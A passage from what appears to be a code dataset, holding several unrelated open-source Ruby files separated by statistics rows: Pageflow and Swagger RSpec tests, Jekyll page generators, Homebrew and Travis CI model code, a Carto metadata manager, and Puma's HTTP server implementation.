tz.transition 2064, 3, :o6, 2972271600, 59399731, 24
tz.transition 2064, 11, :o7, 2992831200, 9900907, 4
end
end
end
end
end
end
| 51.342995 | 66 | 0.575461 |
7907b8d9c9078119bbea3f5fa9300c59a516710f | 1,191 | =begin
#Selling Partner API for Authorization
#The Selling Partner API for Authorization helps developers manage authorizations and check the specific permissions associated with a given authorization.
OpenAPI spec version: v1
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 3.0.24
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for AmzSpApi::AuthorizationApiModel::AuthorizationCode
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
describe 'AuthorizationCode' do
before do
# run before each test
@instance = AmzSpApi::AuthorizationApiModel::AuthorizationCode.new
end
after do
# run after each test
end
describe 'test an instance of AuthorizationCode' do
it 'should create an instance of AuthorizationCode' do
expect(@instance).to be_instance_of(AmzSpApi::AuthorizationApiModel::AuthorizationCode)
end
end
describe 'test attribute "authorization_code"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 29.04878 | 155 | 0.7733 |
e89921520fdf5c04f8c1822f37c47d1c1270b6aa | 5,910 | require 'spec_helper'
describe Admin::FoldersController do
describe '#create' do
describe 'as admin' do
it 'allows to add folder for any account' do
account = create(:account)
sign_in(create(:user, :admin), scope: :user)
expect do
post :create, params: {folder: attributes_for(:folder, account_id: account)}
end.to change { account.folders.count }
end
end
describe 'as account publisher' do
it 'does not allow to add folder to other account' do
account = create(:account)
other_account = create(:account)
sign_in(create(:user, :publisher, on: other_account), scope: :user)
expect do
post :create, params: {folder: attributes_for(:folder, account_id: account)}
end.not_to change { account.folders.count }
end
it 'allows to add folder for own account' do
account = create(:account)
sign_in(create(:user, :publisher, on: account), scope: :user)
expect do
post :create, params: {folder: attributes_for(:folder, account_id: account)}
end.to change { account.folders.count }
end
it 'allows to add folder for account when multiple accounts are present' do
account = create(:account)
other_account = create(:account)
user = create(:user, :publisher, on: account)
create(:membership, user: user, entity: other_account, role: :publisher)
sign_in(user, scope: :user)
expect do
post :create, params: {folder: attributes_for(:folder, account_id: other_account)}
end.to change { other_account.folders.count }
end
end
describe 'as entry manager/account editor of entry on account' do
it 'does not allow to add folder for entry/own account' do
entry = create(:entry)
user = create(:user)
create(:membership, user: user, entity: entry.account, role: :editor)
create(:membership, user: user, entity: entry, role: :manager)
sign_in(user, scope: :user)
expect do
post :create, params: {folder: attributes_for(:folder, account_id: entry.account)}
end.not_to change { entry.account.folders.count }
end
end
end
describe '#update' do
describe 'as admin' do
it 'allows to change name of folder for any account' do
folder = create(:folder)
sign_in(create(:user, :admin), scope: :user)
patch :update, params: {id: folder, folder: {name: 'changed'}}
expect(folder.reload.name).to eq('changed')
end
it 'does not allow to change account of folder' do
folder = create(:folder)
other_account = create(:account)
sign_in(create(:user, :admin), scope: :user)
patch :update, params: {id: folder, folder: {account_id: other_account}}
expect(folder.reload.account).not_to eq(other_account)
end
end
describe 'as account publisher' do
it 'does not allow to change name of folder of other account' do
folder = create(:folder, name: 'old')
other_account = create(:account)
sign_in(create(:user, :publisher, on: other_account), scope: :user)
patch :update, params: {id: folder, folder: {name: 'changed'}}
expect(folder.reload.name).to eq('old')
end
it 'allows to change name of folder of own account' do
folder = create(:folder, name: 'old')
user = create(:user, :publisher, on: folder.account)
sign_in(user, scope: :user)
patch :update, params: {id: folder, folder: {name: 'changed'}}
expect(folder.reload.name).to eq('changed')
end
end
describe 'as entry manager/account editor of entry on account' do
it 'does not allow to change name of folder of entry account' do
entry = create(:entry)
user = create(:user)
create(:membership, user: user, entity: entry.account, role: :editor)
create(:membership, user: user, entity: entry, role: :manager)
folder = create(:folder, name: 'old', account: entry.account)
sign_in(user, scope: :user)
patch :update, params: {id: folder, folder: {name: 'changed'}}
expect(folder.reload.name).to eq('old')
end
end
end
describe '#destroy' do
describe 'as admin' do
it 'allows to destroy folder of any account' do
folder = create(:folder)
sign_in(create(:user, :admin), scope: :user)
expect do
delete :destroy, params: {id: folder}
end.to change { Pageflow::Folder.count }
end
end
describe 'as account publisher' do
it 'does not allow to destroy folder of other account' do
folder = create(:folder)
other_account = create(:account)
sign_in(create(:user, :publisher, on: other_account), scope: :user)
expect do
delete :destroy, params: {id: folder}
end.not_to change { Pageflow::Folder.count }
end
it 'allows to destroy folder of own account' do
folder = create(:folder)
user = create(:user, :publisher, on: folder.account)
sign_in(user, scope: :user)
expect do
delete :destroy, params: {id: folder}
end.to change { Pageflow::Folder.count }
end
end
describe 'as entry manager/account editor of entry on account' do
it 'does not allow to destroy folder of entry account' do
entry = create(:entry)
user = create(:user)
create(:membership, user: user, entity: entry.account, role: :editor)
create(:membership, user: user, entity: entry, role: :manager)
folder = create(:folder, account: entry.account)
sign_in(user, scope: :user)
expect do
delete :destroy, params: {id: folder}
end.not_to change { Pageflow::Folder.count }
end
end
end
end
| 33.202247 | 92 | 0.620812 |
219656818ffa5cf00a13189270bfe453ea89a7fd | 2,199 | # Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Jekyll
require File.expand_path('../WFPage.rb', __FILE__)
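# Page listing every update tagged with a given tag, rendered through the
# updates/tag.liquid layout.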
class UpdatesTagPage < UpdatePage
def initialize(site, path, langcode, tag, updates)
if path.nil?
dir = File.join('updates', 'tags')
else
dir = File.join('updates', path, 'tags')
end
name = "#{tag}.html"
super(site, dir, name, langcode)
title_text = "All updates tagged: " + tag
description_text = "All updates tagged: " + tag
self.data['html_css_file'] = site.config['WFBaseUrl'] + '/styles/updates.css';
self.data['title'] = title_text
self.data['description'] = description_text
self.data['rss'] = false
self.data['tag'] = tag
self.data['updates'] = updates
self.data['theme_color'] = '#4527A0'
self.read_yaml(File.join(site.source, '_layouts'), 'updates/tag.liquid')
end
end
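# Index page listing all available update tags, rendered through the
# updates/tags.liquid layout.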
class UpdatesTagsPage < UpdatePage
def initialize(site, path, langcode, tags)
if path.nil?
dir = File.join('updates', 'tags')
else
dir = File.join('updates', path, 'tags')
end
name = "index.html"
super(site, dir, name, langcode)
title_text = "Filter by tag"
description_text = "Filter posts by tag"
self.data['html_css_file'] = site.config['WFBaseUrl'] + '/styles/updates.css';
self.data['title'] = title_text
self.data['description'] = description_text
self.data['rss'] = false
self.data['tag_path'] = dir
self.data['tags'] = tags
self.read_yaml(File.join(site.source, '_layouts'), 'updates/tags.liquid')
end
end
end
| 31.414286 | 84 | 0.652569 |
6ae55176032ec3ba4950cb6b173c056de8d48f0a | 459 | module UnpackStrategy
class Gzip
include UnpackStrategy
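# A gzip stream begins with the magic bytes 0x1f 0x8b.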
def self.can_extract?(path:, magic_number:)
magic_number.match?(/\A\037\213/n)
end
private
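# Copies the archive into the target directory and gunzips it in place;
# -N restores the original file name stored in the gzip header.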
def extract_to_dir(unpack_dir, basename:, verbose:)
FileUtils.cp path, unpack_dir/basename, preserve: true
quiet_flags = verbose ? [] : ["-q"]
system_command! "gunzip",
args: [*quiet_flags, "-N", "--", unpack_dir/basename]
end
end
end
| 24.157895 | 75 | 0.627451 |
e2e96bf4c7db509f265b02eaf2a1c1707a1613c4 | 2,468 | require 'active_record'
require 'simple_states'
require 'travis/model/encrypted_column'
# Models an incoming request. The only supported source for requests currently is Github.
#
# The Request will be configured by fetching `.travis.yml` from the Github API
# and needs to be approved based on the configuration. Once approved the
# Request creates a Build.
class Request < Travis::Model
require 'travis/model/request/pull_request'
include SimpleStates
serialize :token, Travis::Model::EncryptedColumn.new(disable: true)
class << self
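# Most recent request for the given head commit SHA.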
def last_by_head_commit(head_commit)
where(head_commit: head_commit).order(:id).last
end
def older_than(id)
recent.where('id < ?', id)
end
def recent(limit = 25)
order('id DESC').limit(limit)
end
end
belongs_to :commit
belongs_to :repository
belongs_to :owner, polymorphic: true
has_many :builds
has_many :events, as: :source
validates :repository_id, presence: true
serialize :config
serialize :payload
def event_type
read_attribute(:event_type) || 'push'
end
def ref
payload['ref'] if payload
end
def branch_name
ref.scan(%r{refs/heads/(.*?)$}).flatten.first if ref
end
def tag_name
ref.scan(%r{refs/tags/(.*?)$}).flatten.first if ref
end
def api_request?
event_type == 'api'
end
def pull_request?
event_type == 'pull_request'
end
def pull_request
@pull_request ||= PullRequest.new(payload && payload['pull_request'])
end
def pull_request_title
pull_request.title if pull_request?
end
def pull_request_number
pull_request.number if pull_request?
end
def head_repo
pull_request.head_repo
end
def base_repo
pull_request.base_repo
end
def head_branch
pull_request.head_branch
end
def base_branch
pull_request.base_branch
end
def config_url
GH.full_url("repos/#{repository.slug}/contents/.travis.yml?ref=#{commit.commit}").to_s
end
def same_repo_pull_request?
begin
head_repo && base_repo && head_repo == base_repo
rescue => e
Travis.logger.error("[request:#{id}] Couldn't determine whether pull request is from the same repository: #{e.message}")
false
end
end
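# True if expanding the build matrix for this request's config yields at least one job.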
def creates_jobs?
Build::Config::Matrix.new(
Build::Config.new(config).normalize, multi_os: repository.multi_os_enabled?, dist_group_expansion: repository.dist_group_expansion_enabled?
).expand.size > 0
end
end
| 21.840708 | 145 | 0.708266 |
1c848ed3870f0f225b3ec12aa1418d84d793ed08 | 608 | module Carto
module Dbdirect
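# Stores, reads and clears the set of authorized IPs for a key in a hash kept
# on the (Redis-style) metadata server.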
class MetadataManager
def initialize(config, metadata_server)
@config = config
@metadata = metadata_server
end
attr_reader :config
def save(key, ip_set = [])
@metadata.HSET(config['prefix_namespace'] + key, config['hash_key'], ip_set.join(','))
end
def get(key)
ip_set = @metadata.HGET(config['prefix_namespace'] + key, config['hash_key'])
ip_set.nil? ? [] : ip_set.split(',')
end
def reset(key)
@metadata.DEL(config['prefix_namespace'] + key)
end
end
end
end
| 22.518519 | 94 | 0.595395 |
b9269f175cc2411b05353e71a5d78c74e1b54712 | 28,318 | # frozen_string_literal: true
require 'stringio'
require 'puma/thread_pool'
require 'puma/const'
require 'puma/events'
require 'puma/null_io'
require 'puma/compat'
require 'puma/reactor'
require 'puma/client'
require 'puma/binder'
require 'puma/delegation'
require 'puma/accept_nonblock'
require 'puma/util'
require 'puma/puma_http11'
unless Puma.const_defined? "IOBuffer"
require 'puma/io_buffer'
end
require 'socket'
module Puma
# The HTTP Server itself. Serves out a single Rack app.
#
# This class is used by the `Puma::Single` and `Puma::Cluster` classes
# to generate one or more `Puma::Server` instances capable of handling requests.
# Each Puma process will contain one `Puma::Server` instance.
#
# The `Puma::Server` instance pulls requests from the socket, adds them to a
# `Puma::Reactor` where they get eventually passed to a `Puma::ThreadPool`.
#
# Each `Puma::Server` will have one reactor and one thread pool.
class Server
include Puma::Const
extend Puma::Delegation
attr_reader :thread
attr_reader :events
attr_accessor :app
attr_accessor :min_threads
attr_accessor :max_threads
attr_accessor :persistent_timeout
attr_accessor :auto_trim_time
attr_accessor :reaping_time
attr_accessor :first_data_timeout
# Create a server for the rack app +app+.
#
# +events+ is an object which will be called when certain error events occur
# to be handled. See Puma::Events for the list of current methods to implement.
#
# Server#run returns a thread that you can join on to wait for the server
# to do its work.
#
def initialize(app, events=Events.stdio, options={})
@app = app
@events = events
@check, @notify = Puma::Util.pipe
@status = :stop
@min_threads = 0
@max_threads = 16
@auto_trim_time = 30
@reaping_time = 1
@thread = nil
@thread_pool = nil
@early_hints = nil
@persistent_timeout = options.fetch(:persistent_timeout, PERSISTENT_TIMEOUT)
@first_data_timeout = options.fetch(:first_data_timeout, FIRST_DATA_TIMEOUT)
@binder = Binder.new(events)
@own_binder = true
@leak_stack_on_error = true
@options = options
@queue_requests = options[:queue_requests].nil? ? true : options[:queue_requests]
ENV['RACK_ENV'] ||= "development"
@mode = :http
@precheck_closing = true
end
attr_accessor :binder, :leak_stack_on_error, :early_hints
forward :add_tcp_listener, :@binder
forward :add_ssl_listener, :@binder
forward :add_unix_listener, :@binder
forward :connected_port, :@binder
def inherit_binder(bind)
@binder = bind
@own_binder = false
end
def tcp_mode!
@mode = :tcp
end
# On Linux, use TCP_CORK to better control how the TCP stack
# packetizes our stream. This improves both latency and throughput.
#
if RUBY_PLATFORM =~ /linux/
UNPACK_TCP_STATE_FROM_TCP_INFO = "C".freeze
# 6 == Socket::IPPROTO_TCP
# 3 == TCP_CORK
# 1/0 == turn on/off
def cork_socket(socket)
begin
socket.setsockopt(6, 3, 1) if socket.kind_of? TCPSocket
rescue IOError, SystemCallError
Thread.current.purge_interrupt_queue if Thread.current.respond_to? :purge_interrupt_queue
end
end
def uncork_socket(socket)
begin
socket.setsockopt(6, 3, 0) if socket.kind_of? TCPSocket
rescue IOError, SystemCallError
Thread.current.purge_interrupt_queue if Thread.current.respond_to? :purge_interrupt_queue
end
end
def closed_socket?(socket)
return false unless socket.kind_of? TCPSocket
return false unless @precheck_closing
begin
tcp_info = socket.getsockopt(Socket::SOL_TCP, Socket::TCP_INFO)
rescue IOError, SystemCallError
Thread.current.purge_interrupt_queue if Thread.current.respond_to? :purge_interrupt_queue
@precheck_closing = false
false
else
state = tcp_info.unpack(UNPACK_TCP_STATE_FROM_TCP_INFO)[0]
# TIME_WAIT: 6, CLOSE: 7, CLOSE_WAIT: 8, LAST_ACK: 9, CLOSING: 11
(state >= 6 && state <= 9) || state == 11
end
end
else
def cork_socket(socket)
end
def uncork_socket(socket)
end
def closed_socket?(socket)
false
end
end
def backlog
@thread_pool and @thread_pool.backlog
end
def running
@thread_pool and @thread_pool.spawned
end
# This number represents the number of requests that
# the server is capable of taking right now.
#
# For example if the number is 5 then it means
# there are 5 threads sitting idle ready to take
# a request. If one request comes in, then the
# value would be 4 until it finishes processing.
def pool_capacity
@thread_pool and @thread_pool.pool_capacity
end
# Lopez Mode == raw tcp apps
def run_lopez_mode(background=true)
@thread_pool = ThreadPool.new(@min_threads,
@max_threads,
Hash) do |client, tl|
io = client.to_io
addr = io.peeraddr.last
if addr.empty?
# Set unix socket addrs to localhost
addr = "127.0.0.1:0"
else
addr = "#{addr}:#{io.peeraddr[1]}"
end
env = { 'thread' => tl, REMOTE_ADDR => addr }
begin
@app.call env, client.to_io
rescue Object => e
STDERR.puts "! Detected exception at toplevel: #{e.message} (#{e.class})"
STDERR.puts e.backtrace
end
client.close unless env['detach']
end
@events.fire :state, :running
if background
@thread = Thread.new { handle_servers_lopez_mode }
return @thread
else
handle_servers_lopez_mode
end
end
def handle_servers_lopez_mode
begin
check = @check
sockets = [check] + @binder.ios
pool = @thread_pool
while @status == :run
begin
ios = IO.select sockets
ios.first.each do |sock|
if sock == check
break if handle_check
else
begin
if io = sock.accept_nonblock
client = Client.new io, nil
pool << client
end
rescue SystemCallError
# nothing
rescue Errno::ECONNABORTED
# client closed the socket even before accept
begin
io.close
rescue
Thread.current.purge_interrupt_queue if Thread.current.respond_to? :purge_interrupt_queue
end
end
end
end
rescue Object => e
@events.unknown_error self, e, "Listen loop"
end
end
@events.fire :state, @status
graceful_shutdown if @status == :stop || @status == :restart
rescue Exception => e
STDERR.puts "Exception handling servers: #{e.message} (#{e.class})"
STDERR.puts e.backtrace
ensure
begin
@check.close
rescue
Thread.current.purge_interrupt_queue if Thread.current.respond_to? :purge_interrupt_queue
end
@notify.close
if @status != :restart and @own_binder
@binder.close
end
end
@events.fire :state, :done
end
# Runs the server.
#
# If +background+ is true (the default) then a thread is spun
# up in the background to handle requests. Otherwise requests
# are handled synchronously.
#
def run(background=true)
BasicSocket.do_not_reverse_lookup = true
@events.fire :state, :booting
@status = :run
if @mode == :tcp
return run_lopez_mode(background)
end
queue_requests = @queue_requests
@thread_pool = ThreadPool.new(@min_threads,
@max_threads,
IOBuffer) do |client, buffer|
# Advertise this server into the thread
Thread.current[ThreadLocalKey] = self
process_now = false
begin
if queue_requests
process_now = client.eagerly_finish
else
client.finish
process_now = true
end
rescue MiniSSL::SSLError => e
ssl_socket = client.io
addr = ssl_socket.peeraddr.last
cert = ssl_socket.peercert
client.close
@events.ssl_error self, addr, cert, e
rescue HttpParserError => e
client.write_400
client.close
@events.parse_error self, client.env, e
rescue ConnectionError, EOFError
client.close
else
if process_now
process_client client, buffer
else
client.set_timeout @first_data_timeout
@reactor.add client
end
end
end
@thread_pool.clean_thread_locals = @options[:clean_thread_locals]
if queue_requests
@reactor = Reactor.new self, @thread_pool
@reactor.run_in_thread
end
if @reaping_time
@thread_pool.auto_reap!(@reaping_time)
end
if @auto_trim_time
@thread_pool.auto_trim!(@auto_trim_time)
end
@events.fire :state, :running
if background
@thread = Thread.new { handle_servers }
return @thread
else
handle_servers
end
end
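# Accept loop: waits on the control pipe and all bound sockets, wraps accepted
# connections in Client objects and hands them to the thread pool until the
# server is told to stop.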
def handle_servers
begin
check = @check
sockets = [check] + @binder.ios
pool = @thread_pool
queue_requests = @queue_requests
remote_addr_value = nil
remote_addr_header = nil
case @options[:remote_address]
when :value
remote_addr_value = @options[:remote_address_value]
when :header
remote_addr_header = @options[:remote_address_header]
end
while @status == :run
begin
ios = IO.select sockets
ios.first.each do |sock|
if sock == check
break if handle_check
else
begin
if io = sock.accept_nonblock
client = Client.new io, @binder.env(sock)
if remote_addr_value
client.peerip = remote_addr_value
elsif remote_addr_header
client.remote_addr_header = remote_addr_header
end
pool << client
pool.wait_until_not_full
end
rescue SystemCallError
# nothing
rescue Errno::ECONNABORTED
# client closed the socket even before accept
begin
io.close
rescue
Thread.current.purge_interrupt_queue if Thread.current.respond_to? :purge_interrupt_queue
end
end
end
end
rescue Object => e
@events.unknown_error self, e, "Listen loop"
end
end
@events.fire :state, @status
graceful_shutdown if @status == :stop || @status == :restart
if queue_requests
@reactor.clear!
@reactor.shutdown
end
rescue Exception => e
STDERR.puts "Exception handling servers: #{e.message} (#{e.class})"
STDERR.puts e.backtrace
ensure
@check.close
@notify.close
if @status != :restart and @own_binder
@binder.close
end
end
@events.fire :state, :done
end
# :nodoc:
def handle_check
cmd = @check.read(1)
case cmd
when STOP_COMMAND
@status = :stop
return true
when HALT_COMMAND
@status = :halt
return true
when RESTART_COMMAND
@status = :restart
return true
end
return false
end
# Given a connection on +client+, handle the incoming requests.
#
# This method support HTTP Keep-Alive so it may, depending on if the client
# indicates that it supports keep alive, wait for another request before
# returning.
#
def process_client(client, buffer)
begin
clean_thread_locals = @options[:clean_thread_locals]
close_socket = true
requests = 0
while true
case handle_request(client, buffer)
when false
return
when :async
close_socket = false
return
when true
return unless @queue_requests
buffer.reset
ThreadPool.clean_thread_locals if clean_thread_locals
requests += 1
check_for_more_data = @status == :run
if requests >= MAX_FAST_INLINE
# This will mean that reset will only try to use the data it already
# has buffered and won't try to read more data. What this means is that
# every client, independent of their request speed, gets treated like a slow
# one once every MAX_FAST_INLINE requests.
check_for_more_data = false
end
unless client.reset(check_for_more_data)
close_socket = false
client.set_timeout @persistent_timeout
@reactor.add client
return
end
end
end
# The client disconnected while we were reading data
rescue ConnectionError
# Swallow them. The ensure tries to close +client+ down
# SSL handshake error
rescue MiniSSL::SSLError => e
lowlevel_error(e, client.env)
ssl_socket = client.io
addr = ssl_socket.peeraddr.last
cert = ssl_socket.peercert
close_socket = true
@events.ssl_error self, addr, cert, e
# The client doesn't know HTTP well
rescue HttpParserError => e
lowlevel_error(e, client.env)
client.write_400
@events.parse_error self, client.env, e
# Server error
rescue StandardError => e
lowlevel_error(e, client.env)
client.write_500
@events.unknown_error self, e, "Read"
ensure
buffer.reset
begin
client.close if close_socket
rescue IOError, SystemCallError
Thread.current.purge_interrupt_queue if Thread.current.respond_to? :purge_interrupt_queue
# Already closed
rescue StandardError => e
@events.unknown_error self, e, "Client"
end
end
end
# Given a Hash +env+ for the request read from +client+, add
# and fixup keys to comply with Rack's env guidelines.
#
def normalize_env(env, client)
if host = env[HTTP_HOST]
if colon = host.index(":")
env[SERVER_NAME] = host[0, colon]
env[SERVER_PORT] = host[colon+1, host.bytesize]
else
env[SERVER_NAME] = host
env[SERVER_PORT] = default_server_port(env)
end
else
env[SERVER_NAME] = LOCALHOST
env[SERVER_PORT] = default_server_port(env)
end
unless env[REQUEST_PATH]
# it might be a dumbass full host request header
uri = URI.parse(env[REQUEST_URI])
env[REQUEST_PATH] = uri.path
raise "No REQUEST PATH" unless env[REQUEST_PATH]
# A nil env value will cause a LintError (and fatal errors elsewhere),
# so only set the env value if there actually is a value.
env[QUERY_STRING] = uri.query if uri.query
end
env[PATH_INFO] = env[REQUEST_PATH]
# From http://www.ietf.org/rfc/rfc3875 :
# "Script authors should be aware that the REMOTE_ADDR and
# REMOTE_HOST meta-variables (see sections 4.1.8 and 4.1.9)
# may not identify the ultimate source of the request.
# They identify the client for the immediate request to the
# server; that client may be a proxy, gateway, or other
# intermediary acting on behalf of the actual source client."
#
unless env.key?(REMOTE_ADDR)
begin
addr = client.peerip
rescue Errno::ENOTCONN
# Client disconnects can result in an inability to get the
# peeraddr from the socket; default to localhost.
addr = LOCALHOST_IP
end
# Set unix socket addrs to localhost
addr = LOCALHOST_IP if addr.empty?
env[REMOTE_ADDR] = addr
end
end
def default_server_port(env)
return PORT_443 if env[HTTPS_KEY] == 'on' || env[HTTPS_KEY] == 'https'
env['HTTP_X_FORWARDED_PROTO'] == 'https' ? PORT_443 : PORT_80
end
# Given the request +env+ from +client+ and a partial request body
# in +body+, finish reading the body if there is one and invoke
# the rack app. Then construct the response and write it back to
# +client+
#
# +cl+ is the previously fetched Content-Length header if there
# was one. This is an optimization to keep from having to look
# it up again.
#
def handle_request(req, lines)
env = req.env
client = req.io
return false if closed_socket?(client)
normalize_env env, req
env[PUMA_SOCKET] = client
if env[HTTPS_KEY] && client.peercert
env[PUMA_PEERCERT] = client.peercert
end
env[HIJACK_P] = true
env[HIJACK] = req
body = req.body
head = env[REQUEST_METHOD] == HEAD
env[RACK_INPUT] = body
env[RACK_URL_SCHEME] = env[HTTPS_KEY] ? HTTPS : HTTP
if @early_hints
env[EARLY_HINTS] = lambda { |headers|
fast_write client, "HTTP/1.1 103 Early Hints\r\n".freeze
headers.each_pair do |k, vs|
if vs.respond_to?(:to_s) && !vs.to_s.empty?
vs.to_s.split(NEWLINE).each do |v|
fast_write client, "#{k}: #{v}\r\n"
end
else
fast_write client, "#{k}: #{vs}\r\n"
end
end
fast_write client, "\r\n".freeze
}
end
# A rack extension. If the app writes #call'ables to this
# array, we will invoke them when the request is done.
#
after_reply = env[RACK_AFTER_REPLY] = []
begin
begin
status, headers, res_body = @app.call(env)
return :async if req.hijacked
status = status.to_i
if status == -1
unless headers.empty? and res_body == []
raise "async response must have empty headers and body"
end
return :async
end
rescue ThreadPool::ForceShutdown => e
@events.log "Detected force shutdown of a thread, returning 503"
@events.unknown_error self, e, "Rack app"
status = 503
headers = {}
res_body = ["Request was internally terminated early\n"]
rescue Exception => e
@events.unknown_error self, e, "Rack app", env
status, headers, res_body = lowlevel_error(e, env)
end
content_length = nil
no_body = head
if res_body.kind_of? Array and res_body.size == 1
content_length = res_body[0].bytesize
end
cork_socket client
line_ending = LINE_END
colon = COLON
http_11 = if env[HTTP_VERSION] == HTTP_11
allow_chunked = true
keep_alive = env.fetch(HTTP_CONNECTION, "").downcase != CLOSE
include_keepalive_header = false
# An optimization. The most common response is 200, so we can
# reply with the proper 200 status without having to compute
# the response header.
#
if status == 200
lines << HTTP_11_200
else
lines.append "HTTP/1.1 ", status.to_s, " ",
fetch_status_code(status), line_ending
no_body ||= status < 200 || STATUS_WITH_NO_ENTITY_BODY[status]
end
true
else
allow_chunked = false
keep_alive = env.fetch(HTTP_CONNECTION, "").downcase == KEEP_ALIVE
include_keepalive_header = keep_alive
# Same optimization as above for HTTP/1.1
#
if status == 200
lines << HTTP_10_200
else
lines.append "HTTP/1.0 ", status.to_s, " ",
fetch_status_code(status), line_ending
no_body ||= status < 200 || STATUS_WITH_NO_ENTITY_BODY[status]
end
false
end
response_hijack = nil
headers.each do |k, vs|
case k.downcase
when CONTENT_LENGTH2
content_length = vs
next
when TRANSFER_ENCODING
allow_chunked = false
content_length = nil
when HIJACK
response_hijack = vs
next
end
if vs.respond_to?(:to_s) && !vs.to_s.empty?
vs.to_s.split(NEWLINE).each do |v|
lines.append k, colon, v, line_ending
end
else
lines.append k, colon, line_ending
end
end
if include_keepalive_header
lines << CONNECTION_KEEP_ALIVE
elsif http_11 && !keep_alive
lines << CONNECTION_CLOSE
end
if no_body
if content_length and status != 204
lines.append CONTENT_LENGTH_S, content_length.to_s, line_ending
end
lines << line_ending
fast_write client, lines.to_s
return keep_alive
end
if content_length
lines.append CONTENT_LENGTH_S, content_length.to_s, line_ending
chunked = false
elsif !response_hijack and allow_chunked
lines << TRANSFER_ENCODING_CHUNKED
chunked = true
end
lines << line_ending
fast_write client, lines.to_s
if response_hijack
response_hijack.call client
return :async
end
begin
res_body.each do |part|
next if part.bytesize.zero?
if chunked
fast_write client, part.bytesize.to_s(16)
fast_write client, line_ending
fast_write client, part
fast_write client, line_ending
else
fast_write client, part
end
client.flush
end
if chunked
fast_write client, CLOSE_CHUNKED
client.flush
end
rescue SystemCallError, IOError
raise ConnectionError, "Connection error detected during write"
end
ensure
uncork_socket client
body.close
req.tempfile.unlink if req.tempfile
res_body.close if res_body.respond_to? :close
after_reply.each { |o| o.call }
end
return keep_alive
end
def fetch_status_code(status)
HTTP_STATUS_CODES.fetch(status) { 'CUSTOM' }
end
private :fetch_status_code
# Given the request +env+ from +client+ and the partial body +body+
# plus a potential Content-Length value +cl+, finish reading
# the body and return it.
#
# If the body is larger than MAX_BODY, a Tempfile object is used
# for the body, otherwise a StringIO is used.
#
def read_body(env, client, body, cl)
content_length = cl.to_i
remain = content_length - body.bytesize
return StringIO.new(body) if remain <= 0
# Use a Tempfile if there is a lot of data left
if remain > MAX_BODY
stream = Tempfile.new(Const::PUMA_TMP_BASE)
stream.binmode
else
# The body[0,0] trick is to get an empty string in the same
# encoding as body.
stream = StringIO.new body[0,0]
end
stream.write body
# Read an odd sized chunk so we can read even sized ones
# after this
chunk = client.readpartial(remain % CHUNK_SIZE)
# No chunk means a closed socket
unless chunk
stream.close
return nil
end
remain -= stream.write(chunk)
# Read the rest of the chunks
while remain > 0
chunk = client.readpartial(CHUNK_SIZE)
unless chunk
stream.close
return nil
end
remain -= stream.write(chunk)
end
stream.rewind
return stream
end
# A fallback rack response if +@app+ raises an exception.
#
def lowlevel_error(e, env)
if handler = @options[:lowlevel_error_handler]
if handler.arity == 1
return handler.call(e)
else
return handler.call(e, env)
end
end
if @leak_stack_on_error
[500, {}, ["Puma caught this error: #{e.message} (#{e.class})\n#{e.backtrace.join("\n")}"]]
else
[500, {}, ["An unhandled lowlevel error occurred. The application logs may have details.\n"]]
end
end
# Wait for all outstanding requests to finish.
#
def graceful_shutdown
if @options[:shutdown_debug]
threads = Thread.list
total = threads.size
pid = Process.pid
$stdout.syswrite "#{pid}: === Begin thread backtrace dump ===\n"
threads.each_with_index do |t,i|
$stdout.syswrite "#{pid}: Thread #{i+1}/#{total}: #{t.inspect}\n"
$stdout.syswrite "#{pid}: #{t.backtrace.join("\n#{pid}: ")}\n\n"
end
$stdout.syswrite "#{pid}: === End thread backtrace dump ===\n"
end
if @options[:drain_on_shutdown]
count = 0
while true
ios = IO.select @binder.ios, nil, nil, 0
break unless ios
ios.first.each do |sock|
begin
if io = sock.accept_nonblock
count += 1
client = Client.new io, @binder.env(sock)
@thread_pool << client
end
rescue SystemCallError
end
end
end
@events.debug "Drained #{count} additional connections."
end
if @thread_pool
if timeout = @options[:force_shutdown_after]
@thread_pool.shutdown timeout.to_i
else
@thread_pool.shutdown
end
end
end
def notify_safely(message)
begin
@notify << message
rescue IOError
# The server, in another thread, is shutting down
Thread.current.purge_interrupt_queue if Thread.current.respond_to? :purge_interrupt_queue
rescue RuntimeError => e
# Temporary workaround for https://bugs.ruby-lang.org/issues/13239
if e.message.include?('IOError')
Thread.current.purge_interrupt_queue if Thread.current.respond_to? :purge_interrupt_queue
else
raise e
end
end
end
private :notify_safely
# Stops the acceptor thread and then causes the worker threads to finish
# off the request queue before finally exiting.
def stop(sync=false)
notify_safely(STOP_COMMAND)
@thread.join if @thread && sync
end
def halt(sync=false)
notify_safely(HALT_COMMAND)
@thread.join if @thread && sync
end
def begin_restart
notify_safely(RESTART_COMMAND)
end
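# Writes the entire string to the socket, retrying partial writes and waiting
# up to WRITE_TIMEOUT whenever the socket is not yet writable.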
def fast_write(io, str)
n = 0
while true
begin
n = io.syswrite str
rescue Errno::EAGAIN, Errno::EWOULDBLOCK
if !IO.select(nil, [io], nil, WRITE_TIMEOUT)
raise ConnectionError, "Socket timeout writing data"
end
retry
rescue Errno::EPIPE, SystemCallError, IOError
raise ConnectionError, "Socket timeout writing data"
end
return if n == str.bytesize
str = str.byteslice(n..-1)
end
end
private :fast_write
ThreadLocalKey = :puma_server
def self.current
Thread.current[ThreadLocalKey]
end
def shutting_down?
@status == :stop || @status == :restart
end
end
end
| 27.386847 | 109 | 0.58394 |
ed0a95704046a455fa0e9638e4c5f17061bbada6 | 1,033 | require "language/node"
class BalenaCli < Formula
desc "The official balena CLI tool"
homepage "https://www.balena.io/docs/reference/cli/"
# balena-cli should only be updated every 10 releases on multiples of 10
url "https://registry.npmjs.org/balena-cli/-/balena-cli-12.7.0.tgz"
sha256 "f48464426b086a5e0eb388b4e07d1412260dbe5381b62cd79fe71c608622b6e1"
license "Apache-2.0"
bottle do
sha256 "12e8dd44d5fe88d66834c35e6841cffa16eb1cf876d91e83a9a6ba0f98f7d6ac" => :catalina
